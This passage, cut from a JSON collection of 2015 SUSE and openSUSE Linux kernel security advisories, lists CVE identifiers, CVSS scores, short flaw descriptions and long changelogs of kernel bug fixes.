s390/kgr: reorganize kgr infrastructure in entry64.S.\n - s390/mm: align 64-bit PIE binaries to 4GB (bsc#929879).\n - s390/mm: limit STACK_RND_MASK for compat tasks (bsc#929879).\n - s390/rwlock: add missing local_irq_restore calls (bsc#929879).\n - s390/sclp_vt220: Fix kernel panic due to early terminal input\n (bsc#931860).\n - s390/smp: only send external call ipi if needed (bsc#929879).\n - s390/spinlock,rwlock: always to a load-and-test first (bsc#929879).\n - s390/spinlock: cleanup spinlock code (bsc#929879).\n - s390/spinlock: optimize spin_unlock code (bsc#929879).\n - s390/spinlock: optimize spinlock code sequence (bsc#929879).\n - s390/spinlock: refactor arch_spin_lock_wait[_flags] (bsc#929879).\n - s390/time: use stck clock fast for do_account_vtime (bsc#929879).\n - s390: Remove zfcpdump NR_CPUS dependency (bsc#929879).\n - s390: add z13 code generation support (bsc#929879).\n - s390: avoid z13 cache aliasing (bsc#929879).\n - s390: fix control register update (bsc#929879).\n - s390: optimize control register update (bsc#929879).\n - s390: z13 base performance (bsc#929879).\n - sched: fix __sched_setscheduler() vs load balancing race (bsc#921430)\n - scsi: retry MODE SENSE on unit attention (bsc#895814).\n - scsi_dh_alua: Recheck state on unit attention (bsc#895814).\n - scsi_dh_alua: fixup crash in alua_rtpg_work() (bsc#895814).\n - scsi_dh_alua: parse device id instead of target id (bsc#895814).\n - scsi_dh_alua: recheck RTPG in regular intervals (bsc#895814).\n - scsi_dh_alua: update all port states (bsc#895814).\n - sd: always retry READ CAPACITY for ALUA state transition (bsc#895814).\n - st: null pointer dereference panic caused by use after kref_put by\n st_open (bsc#936875).\n - supported.conf: add btrfs to kernel-$flavor-base (bsc#933637)\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bsc#938024).\n - vTPM: set virtual device before passing to ibmvtpm_reset_crq\n (bsc#937087).\n - vfs: add super_operations->get_inode_dev (bsc#927455).\n - virtio-ccw: virtio-ccw adapter interrupt support (bsc#931860).\n - virtio-rng: do not crash if virtqueue is broken (bsc#931860).\n - virtio: fail adding buffer on broken queues (bsc#931860).\n - virtio: virtio_break_device() to mark all virtqueues broken (bsc#931860).\n - virtio_blk: verify if queue is broken after virtqueue_get_buf()\n (bsc#931860).\n - virtio_ccw: fix hang in set offline processing (bsc#931860).\n - virtio_ccw: fix vcdev pointer handling issues (bsc#931860).\n - virtio_ccw: introduce device_lost in virtio_ccw_device (bsc#931860).\n - virtio_net: do not crash if virtqueue is broken (bsc#931860).\n - virtio_net: verify if queue is broken after virtqueue_get_buf()\n (bsc#931860).\n - virtio_ring: adapt to notify() returning bool (bsc#931860).\n - virtio_ring: add new function virtqueue_is_broken() (bsc#931860).\n - virtio_ring: change host notification API (bsc#931860).\n - virtio_ring: let virtqueue_{kick()/notify()} return a bool (bsc#931860).\n - virtio_ring: plug kmemleak false positive (bsc#931860).\n - virtio_scsi: do not call virtqueue_add_sgs(... GFP_NOIO) holding\n spinlock (bsc#931860).\n - virtio_scsi: verify if queue is broken after virtqueue_get_buf()\n (bsc#931860).\n - vmxnet3: Bump up driver version number (bsc#936423).\n - vmxnet3: Changes for vmxnet3 adapter version 2 (fwd) (bug#936423).\n - vmxnet3: Fix memory leaks in rx path (fwd) (bug#936423).\n - vmxnet3: Register shutdown handler for device (fwd) (bug#936423).\n - x86/PCI: Use host bridge _CRS info on Foxconn K8M890-8237A (bsc#907092).\n - x86/PCI: Use host bridge _CRS info on systems with >32 bit addressing\n (bsc#907092).\n - x86/kgr: move kgr infrastructure from asm to C.\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - xfrm: release dst_orig in case of error in xfrm_lookup() (bsc#932793).\n - xfs: Skip dirty pages in ->releasepage (bsc#915183).\n - xfs: fix xfs_setattr for DMAPI (bsc#932900).\n - xfs_dmapi: fix transaction ilocks (bsc#932899).\n - xfs_dmapi: fix value from newer Linux strnlen_user() (bsc#932897).\n - xfs_dmapi: xfs_dm_rdwr() uses dir file ops not file's ops (bsc#932898).\n\n", "edition": 1, "modified": "2015-07-31T10:08:48", "published": "2015-07-31T10:08:48", "id": "SUSE-SU-2015:1324-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00049.html", "title": "Security update for the SUSE Linux Enterprise 12 kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:27:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1420", "CVE-2015-5364", "CVE-2015-2922", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3636", "CVE-2014-9710", "CVE-2015-2041", "CVE-2014-9731", "CVE-2015-4700", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 11 SP3 Teradata kernel was updated to fix the\n following bugs and security issues.\n\n The following security issues have been fixed:\n\n - Update patches.fixes/udp-fix-behavior-of-wrong-checksums.patch\n (bsc#936831, CVE-2015-5364, CVE-2015-5366).\n - Btrfs: make xattr replace operations atomic (bnc#923908, CVE-2014-9710).\n - udp: fix behavior of wrong checksums (bsc#936831, CVE-2015-5364,\n CVE-2015-5366).\n - vfs: read file_handle only once in handle_to_path (bsc#915517,\n CVE-2015-1420).\n - x86: bpf_jit: fix compilation of large bpf programs\n (bnc#935705,CVE-2015-4700).\n - udf: Check length of extended attributes and allocation (bsc#936831,\n CVE-2015-5364, CVE-2015-5366).\n - Update patches.fixes/udf-Check-component-length-before-reading-it.patch\n (bsc#933904, CVE-2014-9728, CVE-2014-9730).\n - Update patches.fixes/udf-Verify-i_size-when-loading-inode.patch\n (bsc#933904, CVE-2014-9728, CVE-2014-9729).\n - Update patches.fixes/udf-Verify-symlink-size-before-loading-it.patch\n (bsc#933904, CVE-2014-9728).\n - Update patches.fixes/udf-Check-path-length-when-reading-symlink.patch\n (bnc#933896, CVE-2014-9731).\n - pipe: fix iov overrun for failed atomic copy (bsc#933429, CVE-2015-1805).\n - ipv6: Don't reduce hop limit for an interface (bsc#922583,\n CVE-2015-2922).\n - net: llc: use correct size for sysctl timeout entries (bsc#919007,\n CVE-2015-2041).\n - ipv4: Missing sk_nulls_node_init() in ping_unhash() (bsc#929525,\n CVE-2015-3636).\n - ipv6: Don't reduce hop limit for an interface (bsc#922583,\n CVE-2015-2922).\n - net: llc: use correct size for sysctl timeout entries (bsc#919007,\n CVE-2015-2041).\n - ipv4: Missing sk_nulls_node_init() in ping_unhash() (bsc#929525,\n CVE-2015-3636).\n\n The following non-security issues have been fixed:\n\n - mlx4: Check for assigned VFs before disabling SR-IOV (bsc#927355).\n - ixgbe: Use pci_vfs_assigned instead of ixgbe_vfs_are_assigned\n (bsc#927355).\n - pci: Add SRIOV helper function to determine if VFs are assigned to guest\n (bsc#927355).\n - net/mlx4_core: Don't disable SRIOV if there are active VFs (bsc#927355).\n - udf: Remove repeated loads blocksize (bsc#933907).\n - Refresh patches.fixes/deal-with-deadlock-in-d_walk-fix.patch. based on\n 3.2 stable fix 20defcec264c ("dcache: Fix locking bugs in backported\n "deal with deadlock in d_walk()""). Not harmfull for regular SLES\n kernels but RT or PREEMPT kernels would see disbalance.\n - sched: Fix potential near-infinite distribute_cfs_runtime() loop\n (bnc#930786)\n - tty: Correct tty buffer flush (bnc#929647).\n - tty: hold lock across tty buffer finding and buffer filling (bnc#929647).\n\n", "edition": 1, "modified": "2015-07-10T16:08:16", "published": "2015-07-10T16:08:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00023.html", "id": "SUSE-SU-2015:1224-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various\n security and bugfixes.\n\n Following security bugs were fixed:\n\n - CVE-2015-5707: An integer overflow in the SCSI generic driver could be\n potentially used by local attackers to crash the kernel or execute code\n (bsc#940338).\n - CVE-2015-5364: A remote denial of service (hang) via UDP flood with\n incorrect package checksums was fixed. (bsc#936831).\n - CVE-2015-5366: A remote denial of service (unexpected error returns) via\n UDP flood with incorrect package checksums was fixed. (bsc#936831).\n - CVE-2015-1420: A race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel allowed local users to bypass intended\n size restrictions and trigger read operations on additional memory\n locations by changing the handle_bytes value of a file handle during the\n execution of this function (bnc#915517).\n - CVE-2015-4700: A local user could have created a bad instruction in the\n JIT processed BPF code, leading to a kernel crash (bnc#935705).\n - CVE-2015-4167: The UDF filesystem in the Linux kernel was vulnerable to\n a crash which could occur while fetching inode information from a\n corrupted/malicious udf file system image. (bsc#933907).\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731: Various issues\n in handling UDF filesystems in the Linux kernel allowed the corruption\n of kernel memory and other issues. An attacker able to mount a\n corrupted/malicious UDF file system image could cause the kernel to\n crash. (bsc#933904 bsc#933896)\n - CVE-2015-2150: The Linux kernel did not properly restrict access to PCI\n command registers, which might have allowed local guest users to cause a\n denial of service (non-maskable interrupt and host crash) by disabling\n the (1) memory or (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported Request (UR)\n response (bsc#919463).\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in the Linux kernel\n 2.6.x and 3.x in SUSE Linux distributions, allowed guest OS users to\n obtain sensitive information from uninitialized locations in host OS\n kernel memory via unspecified vectors (bnc#917830).\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux kernel did not\n prevent the TS_COMPAT flag from reaching a user-mode task, which might\n have allowed local users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1) fork or (2) close\n system call, as demonstrated by an attack against seccomp before 3.16\n (bnc#926240).\n - CVE-2015-1805: The Linux kernels implementation of vectored pipe read\n and write functionality did not take into account the I/O vectors that\n were already processed when retrying after a failed atomic access\n operation, potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system. (bsc#933429).\n\n\n Also the following non-security bugs were fixed:\n - audit: keep inode pinned (bsc#851068).\n - btrfs: be aware of btree inode write errors to avoid fs corruption\n (bnc#942350).\n - btrfs: check if previous transaction aborted to avoid fs corruption\n (bnc#942350).\n - btrfs: deal with convert_extent_bit errors to avoid fs corruption\n (bnc#942350).\n - cifs: Fix missing crypto allocation (bnc#937402).\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bnc#932348).\n - drm: ast,cirrus,mgag200: use drm_can_sleep (bnc#883380, bsc#935572).\n - drm/cirrus: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: Do not do full cleanup if mgag200_device_init fails.\n - ext3: Fix data corruption in inodes with journalled data (bsc#936637)\n - ext4: handle SEEK_HOLE/SEEK_DATA generically (bsc#934944).\n - fanotify: Fix deadlock with permission events (bsc#935053).\n - fork: reset mm->pinned_vm (bnc#937855).\n - hrtimer: prevent timer interrupt DoS (bnc#886785).\n - hugetlb: do not account hugetlb pages as NR_FILE_PAGES (bnc#930092).\n - hugetlb, kabi: do not account hugetlb pages as NR_FILE_PAGES\n (bnc#930092).\n - IB/core: Fix mismatch between locked and pinned pages (bnc#937855).\n - iommu/amd: Fix memory leak in free_pagetable (bsc#935866).\n - iommu/amd: Handle integer overflow in dma_ops_area_alloc (bsc#931538).\n - iommu/amd: Handle large pages correctly in free_pagetable (bsc#935866).\n - ipr: Increase default adapter init stage change timeout (bsc#930761).\n - ixgbe: Use pci_vfs_assigned instead of ixgbe_vfs_are_assigned\n (bsc#927355).\n - kdump: fix crash_kexec()/smp_send_stop() race in panic() (bnc#937444).\n - kernel: add panic_on_warn. (bsc#934742)\n - kvm: irqchip: Break up high order allocations of kvm_irq_routing_table\n (bnc#926953).\n - libata: prevent HSM state change race between ISR and PIO (bsc#923245).\n - md: use kzalloc() when bitmap is disabled (bsc#939994).\n - megaraid_sas: Use correct reset sequence in adp_reset() (bsc#894936).\n - mlx4: Check for assigned VFs before disabling SR-IOV (bsc#927355).\n - mm/hugetlb: check for pte NULL pointer in __page_check_address()\n (bnc#929143).\n - mm: restrict access to slab files under procfs and sysfs (bnc#936077).\n - net: fib6: fib6_commit_metrics: fix potential NULL pointer dereference\n (bsc#867362).\n - net: Fix "ip rule delete table 256" (bsc#873385).\n - net: ipv6: fib: do not sleep inside atomic lock (bsc#867362).\n - net/mlx4_core: Do not disable SRIOV if there are active VFs (bsc#927355).\n - nfsd: Fix nfsv4 opcode decoding error (bsc#935906).\n - nfsd: support disabling 64bit dir cookies (bnc#937503).\n - nfs: never queue requests with rq_cong set on the sending queue\n (bsc#932458).\n - nfsv4: Minor cleanups for nfs4_handle_exception and\n nfs4_async_handle_error (bsc#939910).\n - pagecache limit: add tracepoints (bnc#924701).\n - pagecache limit: Do not skip over small zones that easily (bnc#925881).\n - pagecache limit: export debugging counters via /proc/vmstat (bnc#924701).\n - pagecache limit: fix wrong nr_reclaimed count (bnc#924701).\n - pagecache limit: reduce starvation due to reclaim retries (bnc#925903).\n - pci: Add SRIOV helper function to determine if VFs are assigned to guest\n (bsc#927355).\n - pci: Disable Bus Master only on kexec reboot (bsc#920110).\n - pci: disable Bus Master on PCI device shutdown (bsc#920110).\n - pci: Disable Bus Master unconditionally in pci_device_shutdown()\n (bsc#920110).\n - pci: Don't try to disable Bus Master on disconnected PCI devices\n (bsc#920110).\n - perf, nmi: Fix unknown NMI warning (bsc#929142).\n - perf/x86/intel: Move NMI clearing to end of PMI handler (bsc#929142).\n - rtlwifi: rtl8192cu: Fix kernel deadlock (bnc#927786).\n - sched: fix __sched_setscheduler() vs load balancing race (bnc#921430)\n - scsi_error: add missing case statements in scsi_decide_disposition()\n (bsc#920733).\n - scsi: Set hostbyte status in scsi_check_sense() (bsc#920733).\n - scsi: set host msg status correctly (bnc#933936)\n - scsi: vmw_pvscsi: Fix pvscsi_abort() function (bnc#940398 bsc#930934).\n - st: null pointer dereference panic caused by use after kref_put by\n st_open (bsc#936875).\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bnc#937641).\n - vmxnet3: Bump up driver version number (bsc#936423).\n - vmxnet3: Changes for vmxnet3 adapter version 2 (fwd) (bug#936423).\n - vmxnet3: Fix memory leaks in rx path (fwd) (bug#936423).\n - vmxnet3: Register shutdown handler for device (fwd) (bug#936423).\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - x86, tls: Interpret an all-zero struct user_desc as "no segment"\n (bsc#920250).\n - x86, tls, ldt: Stop checking lm in LDT_empty (bsc#920250).\n - xenbus: add proper handling of XS_ERROR from Xenbus for transactions.\n - xfs: avoid mounting of xfs filesystems with inconsistent option\n (bnc#925705)\n - zcrypt: Fixed reset and interrupt handling of AP queues (bnc#936925,\n LTC#126491).\n\n", "edition": 1, "modified": "2015-09-23T11:09:59", "published": "2015-09-23T11:09:59", "id": "SUSE-SU-2015:1611-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00021.html", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:18:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 11 SP3 Realtime kernel was updated to receive\n various security and bugfixes.\n\n The following feature was added for RT:\n - FATE#317131: The SocketCAN (Peak PCI) driver was added for CAN bus\n support.\n\n Following security bugs were fixed:\n\n - CVE-2015-5707: An integer overflow in the SCSI generic driver could be\n potentially used by local attackers to crash the kernel or execute code\n (bsc#940338).\n - CVE-2015-5364: A remote denial of service (hang) via UDP flood with\n incorrect package checksums was fixed. (bsc#936831).\n - CVE-2015-5366: A remote denial of service (unexpected error returns) via\n UDP flood with incorrect package checksums was fixed. (bsc#936831).\n - CVE-2015-1420: A race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel allowed local users to bypass intended\n size restrictions and trigger read operations on additional memory\n locations by changing the handle_bytes value of a file handle during the\n execution of this function (bnc#915517).\n - CVE-2015-4700: A local user could have created a bad instruction in the\n JIT processed BPF code, leading to a kernel crash (bnc#935705).\n - CVE-2015-4167: The UDF filesystem in the Linux kernel was vulnerable to\n a crash which could occur while fetching inode information from a\n corrupted/malicious udf file system image. (bsc#933907).\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731: Various issues\n in handling UDF filesystems in the Linux kernel allowed the corruption\n of kernel memory and other issues. An attacker able to mount a\n corrupted/malicious UDF file system image could cause the kernel to\n crash. (bsc#933904 bsc#933896)\n - CVE-2015-2150: The Linux kernel did not properly restrict access to PCI\n command registers, which might have allowed local guest users to cause a\n denial of service (non-maskable interrupt and host crash) by disabling\n the (1) memory or (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported Request (UR)\n response (bsc#919463).\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in the Linux kernel\n 2.6.x and 3.x in SUSE Linux distributions, allowed guest OS users to\n obtain sensitive information from uninitialized locations in host OS\n kernel memory via unspecified vectors (bnc#917830).\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux kernel did not\n prevent the TS_COMPAT flag from reaching a user-mode task, which might\n have allowed local users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1) fork or (2) close\n system call, as demonstrated by an attack against seccomp before 3.16\n (bnc#926240).\n - CVE-2015-1805: The Linux kernels implementation of vectored pipe read\n and write functionality did not take into account the I/O vectors that\n were already processed when retrying after a failed atomic access\n operation, potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system. (bsc#933429).\n\n\n Also the following non-security bugs were fixed:\n - audit: keep inode pinned (bsc#851068).\n - btrfs: be aware of btree inode write errors to avoid fs corruption\n (bnc#942350).\n - btrfs: check if previous transaction aborted to avoid fs corruption\n (bnc#942350).\n - btrfs: deal with convert_extent_bit errors to avoid fs corruption\n (bnc#942350).\n - cifs: Fix missing crypto allocation (bnc#937402).\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bnc#932348).\n - drm: ast,cirrus,mgag200: use drm_can_sleep (bnc#883380, bsc#935572).\n - drm/cirrus: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: do not attempt to acquire a reservation while in an\n interrupt handler (bsc#935572).\n - drm/mgag200: Do not do full cleanup if mgag200_device_init fails.\n - ext3: Fix data corruption in inodes with journalled data (bsc#936637)\n - ext4: handle SEEK_HOLE/SEEK_DATA generically (bsc#934944).\n - fanotify: Fix deadlock with permission events (bsc#935053).\n - fork: reset mm->pinned_vm (bnc#937855).\n - hrtimer: prevent timer interrupt DoS (bnc#886785).\n - hugetlb: do not account hugetlb pages as NR_FILE_PAGES (bnc#930092).\n - hugetlb, kabi: do not account hugetlb pages as NR_FILE_PAGES\n (bnc#930092).\n - IB/core: Fix mismatch between locked and pinned pages (bnc#937855).\n - iommu/amd: Fix memory leak in free_pagetable (bsc#935866).\n - iommu/amd: Handle integer overflow in dma_ops_area_alloc (bsc#931538).\n - iommu/amd: Handle large pages correctly in free_pagetable (bsc#935866).\n - ipr: Increase default adapter init stage change timeout (bsc#930761).\n - ixgbe: Use pci_vfs_assigned instead of ixgbe_vfs_are_assigned\n (bsc#927355).\n - kdump: fix crash_kexec()/smp_send_stop() race in panic() (bnc#937444).\n - kernel: add panic_on_warn. (bsc#934742)\n - kvm: irqchip: Break up high order allocations of kvm_irq_routing_table\n (bnc#926953).\n - libata: prevent HSM state change race between ISR and PIO (bsc#923245).\n - md: use kzalloc() when bitmap is disabled (bsc#939994).\n - megaraid_sas: Use correct reset sequence in adp_reset() (bsc#894936).\n - mlx4: Check for assigned VFs before disabling SR-IOV (bsc#927355).\n - mm/hugetlb: check for pte NULL pointer in __page_check_address()\n (bnc#929143).\n - mm: restrict access to slab files under procfs and sysfs (bnc#936077).\n - net: fib6: fib6_commit_metrics: fix potential NULL pointer dereference\n (bsc#867362).\n - net: Fix "ip rule delete table 256" (bsc#873385).\n - net: ipv6: fib: do not sleep inside atomic lock (bsc#867362).\n - net/mlx4_core: Do not disable SRIOV if there are active VFs (bsc#927355).\n - nfsd: Fix nfsv4 opcode decoding error (bsc#935906).\n - nfsd: support disabling 64bit dir cookies (bnc#937503).\n - nfs: never queue requests with rq_cong set on the sending queue\n (bsc#932458).\n - nfsv4: Minor cleanups for nfs4_handle_exception and\n nfs4_async_handle_error (bsc#939910).\n - pagecache limit: add tracepoints (bnc#924701).\n - pagecache limit: Do not skip over small zones that easily (bnc#925881).\n - pagecache limit: export debugging counters via /proc/vmstat (bnc#924701).\n - pagecache limit: fix wrong nr_reclaimed count (bnc#924701).\n - pagecache limit: reduce starvation due to reclaim retries (bnc#925903).\n - pci: Add SRIOV helper function to determine if VFs are assigned to guest\n (bsc#927355).\n - pci: Disable Bus Master only on kexec reboot (bsc#920110).\n - pci: disable Bus Master on PCI device shutdown (bsc#920110).\n - pci: Disable Bus Master unconditionally in pci_device_shutdown()\n (bsc#920110).\n - pci: Don't try to disable Bus Master on disconnected PCI devices\n (bsc#920110).\n - perf, nmi: Fix unknown NMI warning (bsc#929142).\n - perf/x86/intel: Move NMI clearing to end of PMI handler (bsc#929142).\n - rtlwifi: rtl8192cu: Fix kernel deadlock (bnc#927786).\n - sched: fix __sched_setscheduler() vs load balancing race (bnc#921430)\n - scsi_error: add missing case statements in scsi_decide_disposition()\n (bsc#920733).\n - scsi: Set hostbyte status in scsi_check_sense() (bsc#920733).\n - scsi: set host msg status correctly (bnc#933936)\n - scsi: vmw_pvscsi: Fix pvscsi_abort() function (bnc#940398 bsc#930934).\n - st: null pointer dereference panic caused by use after kref_put by\n st_open (bsc#936875).\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bnc#937641).\n - vmxnet3: Bump up driver version number (bsc#936423).\n - vmxnet3: Changes for vmxnet3 adapter version 2 (fwd) (bug#936423).\n - vmxnet3: Fix memory leaks in rx path (fwd) (bug#936423).\n - vmxnet3: Register shutdown handler for device (fwd) (bug#936423).\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - x86, tls: Interpret an all-zero struct user_desc as "no segment"\n (bsc#920250).\n - x86, tls, ldt: Stop checking lm in LDT_empty (bsc#920250).\n - xenbus: add proper handling of XS_ERROR from Xenbus for transactions.\n - xfs: avoid mounting of xfs filesystems with inconsistent option\n (bnc#925705)\n - zcrypt: Fixed reset and interrupt handling of AP queues (bnc#936925,\n LTC#126491).\n\n", "edition": 1, "modified": "2015-09-22T10:09:40", "published": "2015-09-22T10:09:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00018.html", "id": "SUSE-SU-2015:1592-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:44:54", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4003", "CVE-2015-4692", "CVE-2015-1420", "CVE-2015-5364", "CVE-2015-4002", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2015-1465", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-4001", "CVE-2014-9729", "CVE-2015-3636", "CVE-2015-3212", "CVE-2015-3290", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-4700"], "description": "The openSUSE 13.2 kernel was updated to receive various security and\n bugfixes.\n\n Following security bugs were fixed:\n - CVE-2015-3290: A flaw was found in the way the Linux kernels nested NMI\n handler and espfix64 functionalities interacted during NMI processing. A\n local, unprivileged user could use this flaw to crash the system or,\n potentially, escalate their privileges on the system.\n - CVE-2015-3212: A race condition flaw was found in the way the Linux\n kernels SCTP implementation handled Address Configuration lists when\n performing Address Configuration Change (ASCONF). A local attacker could\n use this flaw to crash the system via a race condition triggered by\n setting certain ASCONF options on a socket.\n - CVE-2015-5364: A remote denial of service (hang) via UDP flood with\n incorrect package checksums was fixed. (bsc#936831).\n - CVE-2015-5366: A remote denial of service (unexpected error returns) via\n UDP flood with incorrect package checksums was fixed. (bsc#936831).\n - CVE-2015-4700: A local user could have created a bad instruction in the\n JIT processed BPF code, leading to a kernel crash (bnc#935705).\n - CVE-2015-1420: Race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel allowed local users to bypass intended\n size restrictions and trigger read operations on additional memory\n locations by changing the handle_bytes value of a file handle during the\n execution of this function (bnc#915517).\n - CVE-2015-4692: The kvm_apic_has_events function in arch/x86/kvm/lapic.h\n in the Linux kernel allowed local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly have unspecified\n other impact by leveraging /dev/kvm access for an ioctl call\n (bnc#935542).\n - CVE-2015-4167 CVE-2014-9728 CVE-2014-9730 CVE-2014-9729 CVE-2014-9731:\n Various problems in the UDF filesystem were fixed that could lead to\n crashes when mounting prepared udf filesystems.\n - CVE-2015-4002: drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver\n in the Linux kernel did not ensure that certain length values are\n sufficiently large, which allowed remote attackers to cause a denial of\n service (system crash or large loop) or possibly execute arbitrary code\n via a crafted packet, related to the (1) oz_usb_rx and (2)\n oz_usb_handle_ep_data functions (bnc#933934).\n - CVE-2015-4003: The oz_usb_handle_ep_data function in\n drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux\n kernel allowed remote attackers to cause a denial of service\n (divide-by-zero error and system crash) via a crafted packet\n (bnc#933934).\n - CVE-2015-4001: Integer signedness error in the oz_hcd_get_desc_cnf\n function in drivers/staging/ozwpan/ozhcd.c in the OZWPAN driver in the\n Linux kernel allowed remote attackers to cause a denial of service\n (system crash) or possibly execute arbitrary code via a crafted packet\n (bnc#933934).\n - CVE-2015-4036: A potential memory corruption in vhost/scsi was fixed.\n - CVE-2015-2922: The ndisc_router_discovery function in net/ipv6/ndisc.c\n in the Neighbor Discovery (ND) protocol implementation in the IPv6 stack\n in the Linux kernel allowed remote attackers to reconfigure a hop-limit\n setting via a small hop_limit value in a Router Advertisement (RA)\n message (bnc#922583).\n - CVE-2015-3636: It was found that the Linux kernels ping socket\n implementation did not properly handle socket unhashing during spurious\n disconnects, which could lead to a use-after-free flaw. On x86-64\n architecture systems, a local user able to create ping sockets could use\n this flaw to crash the system. On non-x86-64 architecture systems, a\n local user able to create ping sockets could use this flaw to escalate\n their privileges on the system.\n - CVE-2015-2041: net/llc/sysctl_net_llc.c in the Linux kernel used an\n incorrect data type in a sysctl table, which allowed local users to\n obtain potentially sensitive information from kernel memory or possibly\n have unspecified other impact by accessing a sysctl entry (bnc#919007).\n - CVE-2015-3339: Race condition in the prepare_binprm function in\n fs/exec.c in the Linux kernel allowed local users to gain privileges by\n executing a setuid program at a time instant when a chown to root is in\n progress, and the ownership is changed but the setuid bit is not yet\n stripped.\n - CVE-2015-1465: The IPv4 implementation in the Linux kernel did not\n properly consider the length of the Read-Copy Update (RCU) grace period\n for redirecting lookups in the absence of caching, which allowed remote\n attackers to cause a denial of service (memory consumption or system\n crash) via a flood of packets (bnc#916225).\n\n The following non-security bugs were fixed:\n - ALSA: ak411x: Fix stall in work callback (boo#934755).\n - ALSA: emu10k1: Emu10k2 32 bit DMA mode (boo#934755).\n - ALSA: emu10k1: Fix card shortname string buffer overflow (boo#934755).\n - ALSA: emu10k1: do not deadlock in proc-functions (boo#934755).\n - ALSA: emux: Fix mutex deadlock at unloading (boo#934755).\n - ALSA: emux: Fix mutex deadlock in OSS emulation (boo#934755).\n - ALSA: hda - Add AZX_DCAPS_SNOOP_OFF (and refactor snoop setup)\n (boo#934755).\n - ALSA: hda - Add Conexant codecs CX20721, CX20722, CX20723 and CX20724\n (boo#934755).\n - ALSA: hda - Add common pin macros for ALC269 family (boo#934755).\n - ALSA: hda - Add dock support for ThinkPad X250 (17aa:2226) (boo#934755).\n - ALSA: hda - Add dock support for Thinkpad T450s (17aa:5036) (boo#934755).\n - ALSA: hda - Add headphone quirk for Lifebook E752 (boo#934755).\n - ALSA: hda - Add headset mic quirk for Dell Inspiron 5548 (boo#934755).\n - ALSA: hda - Add mute-LED mode control to Thinkpad (boo#934755).\n - ALSA: hda - Add one more node in the EAPD supporting candidate list\n (boo#934755).\n - ALSA: hda - Add pin configs for ASUS mobo with IDT 92HD73XX codec\n (boo#934755).\n - ALSA: hda - Add ultra dock support for Thinkpad X240 (boo#934755).\n - ALSA: hda - Add workaround for CMI8888 